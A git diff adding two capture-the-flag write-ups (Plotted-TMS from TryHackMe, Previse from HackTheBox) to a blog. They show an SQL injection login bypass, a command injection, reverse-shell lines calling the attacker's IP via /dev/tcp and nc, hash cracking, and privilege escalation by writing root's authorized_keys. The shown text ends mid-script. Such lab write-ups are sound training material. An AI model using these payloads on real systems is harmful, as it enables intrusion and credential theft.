diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png
new file mode 100644
index 0000000..e263a14
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bf8911cec2a1d04f9eeb89f477606b92141402cccc0c2943843c7819aa169066
+size 295536
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp
new file mode 100644
index 0000000..2106317
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0612ea33b2f6a4aef315b6daa591b27d8b69660b6f258d479a6b6e710075fc05
+size 45986
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png
new file mode 100644
index 0000000..e412c2a
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9eea17bedb3dcb47323b4f1832bb63e4fa49f1fb83ecb0a1ba39a3511c456c0d
+size 59817
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp
new file mode 100644
index 0000000..cb14617
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0b6f9a13e13f05f98ff1df369e86e2c186369ccbc343529879f54f7fd12445a9
+size 30470
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png
new file mode 100644
index 0000000..07720bc
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a1aee28c30bf9cd2d5c125303402877cb58f0e632a55980d1cca542b248ca693
+size 29655
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp
new file mode 100644
index 0000000..246e74d
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1b045f0c5ace374be09b3e594fce4cda809693a20180c4c4c4bbb511992338bc
+size 9582
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png
new file mode 100644
index 0000000..37d9689
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6979ef1781496969bd2e39fcab2c8d7c805a3ed9e0484356b3ece74968854e52
+size 28550
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp
new file mode 100644
index 0000000..cdf0e33
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:813f3c43c3ec797aa7649437b0b02c306bb61b1d3f36e81a1343061e86194d25
+size 25778
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png
new file mode 100644
index 0000000..df314ba
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dcdbd5727bcbf56a145ff5f83cd6c20b3d96e40f22faa6dba99837aa6838be59
+size 19464
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp
new file mode 100644
index 0000000..43de3d4
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ab3e4ebaa88582b526afd1d1410f7e9cec6faa93b2d931ee59f179bba79ae788
+size 34576
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png
new file mode 100644
index 0000000..35b92b8
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3b65b05d6bb3622a66c585479ecc1ab7ac5b29f950b8e9ab87f3e3b76d8fa6d7
+size 7925
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp
new file mode 100644
index 0000000..d1bf998
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f4804f06e65fa802bd249fcf7245fd3fb3c5eae0425347ad3a0dcc6836e7f561
+size 8794
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png
new file mode 100644
index 0000000..4bcb3f8
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6a25617f80d6432ab69532b2ea59f5e4e9c73aaa89eb0c18f45a96ef4f9c32d7
+size 17943
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp
new file mode 100644
index 0000000..854ab70
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:75736c62670dd4a98bdebc0ec77c420bdf7a35f7071e87290bc73a9af0f24c5e
+size 18450
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/index.md b/content/writeup-ctf/writeup-plotted-tms-thm/index.md
new file mode 100644
index 0000000..9ea28a2
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/index.md
@@ -0,0 +1,117 @@
+---
+title: "Writeup - Plotted-TMS (THM)"
+date: 2022-03-31
+slug: "writeup-plotted-tms-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.173.55
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 445/tcp : HTTP web server (Apache 2.4.41)
+
+## Exploit
+
+I start by listing the directories of the site hosted on port 445:
+
+![](img/image-2.webp)
+
+We find a `management` page that gives us access to an admin login page.
+
+![](img/image-3.webp)
+
+After a few injection tests I finally managed to connect with the following injection:
+
+
+```bash
+Username = ' or 1=1;-- -
+```
+I now have access to the admin panel of the site.
+
+![](img/image-4.webp)
+
+In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell.
+
+![](img/image-5.webp)
+
+Then I access it via the following address:
+
+
+```bash
+http://10.10.173.55:445/management/uploads/
+```
+I now have a reverse shell with the user `www-data`.
+
+![](img/image-6.webp)
+
+After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user.
+
+![](img/image-7.webp)
+
+After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`.
+
+![](img/image-8.webp)
+
+I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`.
+
+To do this I use the following commands:
+
+
+```bash
+mv backup.sh tmp
+touch backup.sh
+echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
+chmod +x backup.sh
+```
+![](img/image-9.webp)
+
+I now have a reverse shell with the user `plot_admin` and I can get the first flag.
+
+## Privilege escalation
+
+I start by listing the SUID files with the following command:
+
+
+```bash
+find / -perm -u=s -type f 2>/dev/null
+```
+I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`.
+
+![](img/image-10.webp)
+
+I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command.
+
+I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account.
+
+To do this I use the following commands:
+
+
+```bash
+FILE=/root/.ssh/authorized_keys
+echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"
+```
+![](img/image-11.webp)
+
+I now have a shell `root` shell and can retrieve the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))
+- Implement code detection in the admin panel image uploads
+- Store CRON scripts in a folder accessible only by the author
+- Do not allow root rights on commands that do not require it
diff --git a/content/writeup-ctf/writeup-previse-htb/featured.png b/content/writeup-ctf/writeup-previse-htb/featured.png
new file mode 100644
index 0000000..55ff4ed
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5c7352dd4b88cafda0263d83a267b3c8fcabe868bb3b119ddaa9929d37b2154a
+size 402314
diff --git a/content/writeup-ctf/writeup-previse-htb/featured.webp b/content/writeup-ctf/writeup-previse-htb/featured.webp
new file mode 100644
index 0000000..527a5ce
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:edf6dba08a8c6f1f848d68b90929352c1c5d5c73f4e5eba12c3801ed592035a9
+size 33118
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.png b/content/writeup-ctf/writeup-previse-htb/img/image-1.png
new file mode 100644
index 0000000..0a660a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e8b5f2dcb01d7a68a8c9cd1164a23b23440e99041982a9a294706a3cdf6a92c4
+size 36260
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-1.webp b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp
new file mode 100644
index 0000000..b159b67
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:16184b614c14e29e189e3dcc95d87ffc39726b433c76fb1d23b462ebfb6c6e72
+size 31370
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.png b/content/writeup-ctf/writeup-previse-htb/img/image-10.png
new file mode 100644
index 0000000..427430b
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f926dee60d601f5ba365c401d760489b80cd05b9620942161cd88f76c11524c1
+size 26805
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-10.webp b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp
new file mode 100644
index 0000000..5413102
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a5618c4cf4deda43e0cf7db49354c15aa5c3e733f80da30136d4ba64c5fc3ae0
+size 32232
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.png b/content/writeup-ctf/writeup-previse-htb/img/image-11.png
new file mode 100644
index 0000000..908b07a
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8d7f9bd33e5f2e407ca27f7423d3ee0a83feefb107f8539b6a6a44eefddd8b11
+size 16351
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-11.webp b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp
new file mode 100644
index 0000000..1a207a1
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:01b349989d1cf7511d36086e6558d193ae45791d6a130d26702a27d3464c2f54
+size 14464
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.png b/content/writeup-ctf/writeup-previse-htb/img/image-12.png
new file mode 100644
index 0000000..e353f45
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:44cd015c0ca870ba4585094175d606117b6f619d21dcced3f82042a33c930abe
+size 78309
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-12.webp b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp
new file mode 100644
index 0000000..eb44342
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d7b1dc6dc600f9810407cbd164e5d1cd67abbae8da1b19ed0cbd4a8391d4572
+size 63604
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.png b/content/writeup-ctf/writeup-previse-htb/img/image-13.png
new file mode 100644
index 0000000..a0d017a
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:327652e47d079e1afbfe3f1e0696a45afdedeccb8bea359322c3c8d9a668e651
+size 27456
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-13.webp b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp
new file mode 100644
index 0000000..6422490
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9998eb9c211eb127686cf5a80226444fc980f5cc46090061486612507ba41352
+size 29516
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.png b/content/writeup-ctf/writeup-previse-htb/img/image-14.png
new file mode 100644
index 0000000..56b8eb5
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff77287e44545a054872984ffd8fd8ab2078456f753d71bd1c38af04739a0df8
+size 19139
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-14.webp b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp
new file mode 100644
index 0000000..0b09cb6
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6607ca7d38c1aed95efb3607d76272b438e9c9cfe8eaa419fec2a2e6ee00f9f0
+size 18876
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.png b/content/writeup-ctf/writeup-previse-htb/img/image-2.png
new file mode 100644
index 0000000..6b89e53
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c42151a19dccfbeb83b0abfae8bb3edf8d577a8f9968793d099b078dbb1c9cb5
+size 33756
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-2.webp b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp
new file mode 100644
index 0000000..19df5ce
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:97a395f28f162d9359f3e1d1fefda154f33bc5ceb74776ef68dacc584bbc8063
+size 19572
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.png b/content/writeup-ctf/writeup-previse-htb/img/image-3.png
new file mode 100644
index 0000000..32f06aa
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f49389d82f4296e8755fba7a71d168b7a1cdaa9fbf68a9ed8406480a66df8d5d
+size 117782
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-3.webp b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp
new file mode 100644
index 0000000..d6f399b
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a2be5109bb55d9184003298dab9ffb4200c5d8114f515824194bf33e3e72e777
+size 99392
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.png b/content/writeup-ctf/writeup-previse-htb/img/image-4.png
new file mode 100644
index 0000000..13d8806
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a9e7c0dad2e6dde8c5df0931dcc4d5a3d6e1c6c3775802a9b11d1c1c07cbf1fc
+size 11627
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-4.webp b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp
new file mode 100644
index 0000000..9a3db2c
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5b688e037569b5e46e8038732a6e3130b231b0dbd2c6273e7e5c80eddfb0224b
+size 10488
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.png b/content/writeup-ctf/writeup-previse-htb/img/image-5.png
new file mode 100644
index 0000000..dc04446
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ca6f99bb5a1b408a66ea5cf9247b2f57b5f8bfe49bdc0993a3bdce008708fbbf
+size 42556
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-5.webp b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp
new file mode 100644
index 0000000..cb190dc
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:129bff72546e011542b692ff1516d624ea404ef609d3a3eaaca8796abad33ca9
+size 45570
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.png b/content/writeup-ctf/writeup-previse-htb/img/image-6.png
new file mode 100644
index 0000000..e60e26d
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9b14c0cd543f8c4de7ad907efcd4ff1f5bc55aadbc1ce592ea72881b13ae1a61
+size 18656
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-6.webp b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp
new file mode 100644
index 0000000..7e20983
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:80130de65298ef6fddafa10e3486e9e47287d8f4bf051dc8924dbe3478f7b393
+size 11796
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.png b/content/writeup-ctf/writeup-previse-htb/img/image-7.png
new file mode 100644
index 0000000..1747a6e
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a33447cbe338528ad40490ae58ff450bf3ee733fd1d069ee90fa348ba65ecdd2
+size 22811
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-7.webp b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp
new file mode 100644
index 0000000..4343609
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:11a0f3f9621782c271b6f76ba7f372f8654c0d101b0fe14587cb581b6f18fedd
+size 14008
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.png b/content/writeup-ctf/writeup-previse-htb/img/image-8.png
new file mode 100644
index 0000000..fa9c9bd
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8f3247775533cbd65c78c6ec6e3cdd0fb0d2146cd7afb70201f9e7d70f654fd8
+size 76861
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-8.webp b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp
new file mode 100644
index 0000000..f6fc3a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7dd4c594eb011029d8b001b966895c9647b99450e0e18af3c2149fdbcfb7e47a
+size 63944
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.png b/content/writeup-ctf/writeup-previse-htb/img/image-9.png
new file mode 100644
index 0000000..46a235d
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3f6e0d76ed83acfe9ab45c680052b9012e17ab12767b19e7163d62063f9acdf3
+size 11229
diff --git a/content/writeup-ctf/writeup-previse-htb/img/image-9.webp b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp
new file mode 100644
index 0000000..f965724
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:296b7d4b3af55af2e1146448c90fbe0a9550f46784ea37a90d3122190fe6a251
+size 10806
diff --git a/content/writeup-ctf/writeup-previse-htb/index.md b/content/writeup-ctf/writeup-previse-htb/index.md
new file mode 100644
index 0000000..4b4cd13
--- /dev/null
+++ b/content/writeup-ctf/writeup-previse-htb/index.md
@@ -0,0 +1,247 @@
+---
+title: "Writeup - Previse (HTB)"
+date: 2022-03-23
+slug: "writeup-previse-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Previse](https://app.hackthebox.com/machines/Previse) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.104
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (Apache 2.4.49)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all, I start by listing the pages of the site with `ffuf`. After a first execution of the command, I notice that there are few pages, I run the command again with a filter to find particular `.php` pages.
+
+![](img/image-3.webp)
+
+There are a lot of pages and one in particular that catches my attention : `nav.php`.
+
+![](img/image-4.webp)
+
+One page in the list is particularly interesting : `CREATE ACCOUNT`. Which refers to `accounts.php`. The only problem is that if I try to go on the page with a browser I am redirected to `login.php` immediately. So I make a `curl` request to try to see the content of the account page.
+
+![](img/image-5.webp)
+
+On this page we find a form to create an account. Since it is a simple redirection, it is normally possible to make a direct request with the form without being impacted by the redirection to `login.php`. To do so, create the following request with burp :
+
+
+```bash
+POST /accounts.php HTTP/1.1
+Host: 10.10.11.104
+Content-Length: 46
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.11.104
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.11.104/accounts.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds
+Connection: close
+
+username=azerty&password=azerty&confirm=azerty
+
+```
+I now have an account and can connect to the web interface.
+
+![](img/image-6.webp)
+
+On this web interface, we find a certain number of information, in particular a page to download logs : `file_logs.php`. But also a page to upload files : `files.php`.
+
+
+```bash
+time user fileID
+1622482496 m4lwhere 4
+1622485614 m4lwhere 4
+1622486215 m4lwhere 4
+1622486218 m4lwhere 1
+1622486221 m4lwhere 1
+1622678056 m4lwhere 5
+1622678059 m4lwhere 6
+1622679247 m4lwhere 1
+1622680894 m4lwhere 5
+1622708567 m4lwhere 4
+1622708573 m4lwhere 4
+1622708579 m4lwhere 5
+1622710159 m4lwhere 4
+1622712633 m4lwhere 4
+1622715674 m4lwhere 24
+1622715842 m4lwhere 23
+1623197471 m4lwhere 25
+1623200269 m4lwhere 25
+1623236411 m4lwhere 23
+1623236571 m4lwhere 26
+1623238675 m4lwhere 23
+1623238684 m4lwhere 23
+1623978778 m4lwhere 32
+```
+
+[](img/image-7.webp)
+
+I find that we have the possibility to download a backup of the site files. I download the archive and find a `config.php` file in which we find the credentials of the mysql database.
+
+
+```bash
+<?php
+
+function connectDB(){
+    $host = 'localhost';
+    $user = 'root';
+    $passwd = 'mySQL_p@ssw0rd!:)';
+    $db = 'previse';
+    $mycon = new mysqli($host, $user, $passwd, $db);
+    return $mycon;
+}
+
+?>
+```
+I also find in the `logs.php` file that the page executes a shell command when we make a request on this same page.
+
+![](img/image-8.webp)
+
+So I will be able to inject a command during a request and create a reverse shell. To do this I create the following request:
+
+
+```bash
+POST /logs.php HTTP/1.1
+Host: 10.10.11.104
+Content-Length: 44
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.11.104
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.11.104/file_logs.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qmeps94op0toeahb44u0qh6eds
+Connection: close
+
+delim=comma; nc 10.10.16.3 1234 -e /bin/bash
+```
+![](img/image-9.webp)
+
+I now have a reverse shell as `www-data`. I use credentials to connect to the mysql database:
+
+![](img/image-10.webp)
+
+I enter in the `previse` database, then I list the tables :
+
+![](img/image-11.webp)
+
+The  `accounts` table is interesting, I extract the data with the following command:
+
+
+```bash
+mysql> SELECT * from accounts;
+SELECT * from accounts;
++----+----------+------------------------------------+---------------------+
+| id | username | password                           | created_at          |
++----+----------+------------------------------------+---------------------+
+|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
+|  2 | azerty   | $1$🧂llol$Vxo8V803JRfho0nQ/u2/T0 | 2022-03-21 10:43:49 |
++----+----------+------------------------------------+---------------------+
+2 rows in set (0.00 sec)
+```
+We find the hash of the user `m4lwhere`. We will use hashcat and rockyou to crack the hash. To do this I use the following command:
+
+
+```bash
+hashcat.exe -m 500 -a 0 .\hash.txt .\rockyou.txt
+hashcat (v6.2.5) starting
+[...]
+Hashes: 1 digests; 1 unique digests, 1 unique salts
+Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+Rules: 1
+
+Optimizers applied:
+* Zero-Byte
+* Single-Hash
+* Single-Salt
+
+[...]
+
+Dictionary cache built:
+* Filename..: .\rockyou.txt
+* Passwords.: 14344392
+* Bytes.....: 139921507
+* Keyspace..: 14344385
+* Runtime...: 0 secs
+
+$1$­ƒºéllol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
+[...]
+```
+
+{{< alert icon="circle-info" >}}
+To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time.
+{{< /alert >}}
+
+Ok we find that the password of this user is `ilovecody112235!`. I connect to the user with SSH :
+
+![](img/image-12.webp)
+
+I now have a shell with the user `m4lwhere` and I get the first flag.
+
+## Privilege escalation
+
+At first I check if the user has SUDO authorization on some order:
+
+
+```bash
+m4lwhere@previse:~$ sudo -l
+User m4lwhere may run the following commands on previse:
+    (root) /opt/scripts/access_backup.sh
+```
+The user can run the script `access_backup.sh` with root privileges. Let's see what this script does:
+
+![](img/image-13.webp)
+
+This script is quite simple, it creates backups of Apache logs. Interestingly, the script does not use the absolute path of the Gzip program. So we will be able to manipulate the PATH variable so that the script uses an alternative version that we will create.
+
+So I create a `gzip` file in the `/tmp` folder with the following content:
+
+
+```bash
+#!/bin/bash
+
